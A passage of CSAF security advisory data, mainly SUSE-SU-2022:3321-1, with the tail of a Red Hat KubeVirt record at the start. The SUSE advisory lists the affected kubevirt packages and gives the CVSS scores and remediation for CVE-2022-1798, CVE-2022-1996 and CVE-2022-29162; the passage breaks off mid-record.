"8Base-CNV-4.9:container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", "8Base-CNV-4.9:container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", "8Base-CNV-4.9:container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", "8Base-CNV-4.9:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", "8Base-CNV-4.9:container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", "8Base-CNV-4.9:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", "8Base-CNV-4.9:container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", "8Base-CNV-4.9:container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", "8Base-CNV-4.9:container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", "8Base-CNV-4.9:container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", "8Base-CNV-4.9:container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", "8Base-CNV-4.9:container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", "8Base-CNV-4.9:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
suse-su-2022:3321-1
Vulnerability from csaf_suse
Published
2022-09-20 15:19
Modified
2022-09-20 15:19
Summary
Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container
Notes
Title of the patch
Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container
Description of the patch
This update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container fixes the following issues:
Security issues fixed:
- CVE-2022-1798: Fix arbitrary file read on the host from KubeVirt VMs (bsc#1202516)
Security issues fixed in vendored dependencies:
- CVE-2022-1996: Fixed go-restful CORS bypass (bsc#1200528)
- CVE-2022-29162: Fixed runc incorrect handling of inheritable capabilities in default configuration (bsc#1199460)
Other fixes:
- Pack nft rules and nsswitch.conf for virt-handler
- Only create 1MiB-aligned disk images (bsc#1199603)
- Avoid to return nil failure message
- Use semantic equality comparison
- Allow to configure utility containers for update test
- Install nftables to manage network rules
- Install tar to allow kubectl cp ...
- Symlink nsswitch.conf and nft rules to proper locations
- Enable USB redirection support for QEMU
- Install vim-small instread of vim
- Drop libvirt-daemon-driver-storage-core
- Install ethtool and gawk (bsc#1199392)
- Use non-versioned appliance to avoid redundant rpm query
- Explicitly state the dependency on kubevirt main package
Patchnames
SUSE-2022-3321,SUSE-SLE-Module-Containers-15-SP3-2022-3321,openSUSE-SLE-15.3-2022-3321
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container", title: "Title of the patch", }, { category: "description", text: "This update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container fixes the following issues:\n\nSecurity issues fixed:\n\n- CVE-2022-1798: Fix arbitrary file read on the host from KubeVirt VMs (bsc#1202516)\n\nSecurity issues fixed in vendored dependencies:\n\n- CVE-2022-1996: Fixed go-restful CORS bypass (bsc#1200528)\n- CVE-2022-29162: Fixed runc incorrect handling of inheritable capabilities in default configuration (bsc#1199460)\n\nOther fixes:\n\n- Pack nft rules and nsswitch.conf for virt-handler\n- Only create 1MiB-aligned disk images (bsc#1199603)\n- Avoid to return nil failure message\n- Use semantic equality comparison\n- Allow to configure utility containers for update test\n- Install nftables to manage network rules\n- Install tar to allow kubectl cp ...\n- Symlink nsswitch.conf and nft rules to proper locations\n- Enable USB redirection support for QEMU\n- Install vim-small instread of vim\n- Drop libvirt-daemon-driver-storage-core\n- Install ethtool and gawk (bsc#1199392)\n- Use non-versioned appliance to avoid redundant rpm query\n- Explicitly state the dependency on kubevirt main package\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2022-3321,SUSE-SLE-Module-Containers-15-SP3-2022-3321,openSUSE-SLE-15.3-2022-3321", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2022_3321-1.json", }, { category: "self", summary: "URL for SUSE-SU-2022:3321-1", url: "https://www.suse.com/support/update/announcement/2022/suse-su-20223321-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2022:3321-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2022-September/012297.html", }, { category: "self", summary: "SUSE Bug 1199392", url: "https://bugzilla.suse.com/1199392", }, { category: "self", summary: "SUSE Bug 1199460", url: "https://bugzilla.suse.com/1199460", }, { category: "self", summary: "SUSE Bug 1199603", url: "https://bugzilla.suse.com/1199603", }, { category: "self", summary: "SUSE Bug 1200528", url: "https://bugzilla.suse.com/1200528", }, { category: "self", summary: "SUSE Bug 1202516", url: "https://bugzilla.suse.com/1202516", }, { category: "self", summary: "SUSE CVE CVE-2022-1798 page", url: "https://www.suse.com/security/cve/CVE-2022-1798/", }, { category: "self", summary: "SUSE CVE CVE-2022-1996 page", url: "https://www.suse.com/security/cve/CVE-2022-1996/", }, { category: "self", summary: "SUSE CVE CVE-2022-29162 page", url: "https://www.suse.com/security/cve/CVE-2022-29162/", }, ], title: "Security update for kubevirt, virt-api-container, virt-controller-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container", tracking: { current_release_date: "2022-09-20T15:19:24Z", generator: { date: "2022-09-20T15:19:24Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2022:3321-1", initial_release_date: "2022-09-20T15:19:24Z", revision_history: [ { date: "2022-09-20T15:19:24Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-tests-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-tests-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-tests-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", product: { name: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", product_id: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", }, }, { category: "product_version", name: "obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", product: { name: "obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", product_id: "obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Containers 15 SP3", product: { name: "SUSE Linux Enterprise Module for Containers 15 SP3", product_id: "SUSE Linux Enterprise Module for Containers 15 SP3", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-containers:15:sp3", }, }, }, { category: "product_name", name: "openSUSE Leap 15.3", product: { name: "openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.3", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP3", product_id: "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "SUSE Linux Enterprise Module for Containers 15 SP3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP3", product_id: "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "SUSE Linux Enterprise Module for Containers 15 SP3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-tests-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-tests-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", }, product_reference: "kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, { category: "default_component_of", full_product_name: { name: "obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64 as component of openSUSE Leap 15.3", product_id: "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", }, product_reference: "obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", relates_to_product_reference: "openSUSE Leap 15.3", }, ], }, vulnerabilities: [ { cve: "CVE-2022-1798", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-1798", }, ], notes: [ { category: "general", text: "A path traversal vulnerability in KubeVirt versions up to 0.56 (and 0.55.1) on all platforms allows a user able to configure the kubevirt to read arbitrary files on the host filesystem which are publicly readable or which are readable for UID 107 or GID 107. /proc/self/<> is not accessible.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-1798", url: "https://www.suse.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "SUSE Bug 1202516 for CVE-2022-1798", url: "https://bugzilla.suse.com/1202516", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-20T15:19:24Z", details: "important", }, ], title: "CVE-2022-1798", }, { cve: "CVE-2022-1996", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-1996", }, ], notes: [ { category: "general", text: "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-1996", url: "https://www.suse.com/security/cve/CVE-2022-1996", }, { category: "external", summary: "SUSE Bug 1200528 for CVE-2022-1996", url: "https://bugzilla.suse.com/1200528", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], scores: [ { cvss_v3: { baseScore: 9.1, baseSeverity: "CRITICAL", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, ], threats: [ { category: "impact", date: "2022-09-20T15:19:24Z", details: "critical", }, ], title: "CVE-2022-1996", }, { cve: "CVE-2022-29162", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2022-29162", }, ], notes: [ { category: "general", text: "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where `runc exec --cap` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes `runc exec --cap` behavior such that the additional capabilities granted to the process being executed (as specified via `--cap` arguments) do not include inheritable capabilities. In addition, `runc spec` is changed to not set any inheritable capabilities in the created example OCI spec (`config.json`) file.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "SUSE Linux Enterprise Module for Containers 15 SP3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-container-disk-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-manifests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-tests-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-api-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-controller-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-handler-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-launcher-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virt-operator-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:kubevirt-virtctl-0.49.0-150300.8.13.1.x86_64", "openSUSE Leap 15.3:obs-service-kubevirt_containers_meta-0.49.0-150300.8.13.1.x86_64", ], }, references: [ { category: "external", summary: "CVE-2022-29162", url: "https://www.suse.com/security/cve/CVE-2022-29162", }, { category: "external", summary: "SUSE Bug 1199460 for CVE-2022-29162", url: "https://bugzilla.suse.com/1199460", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security 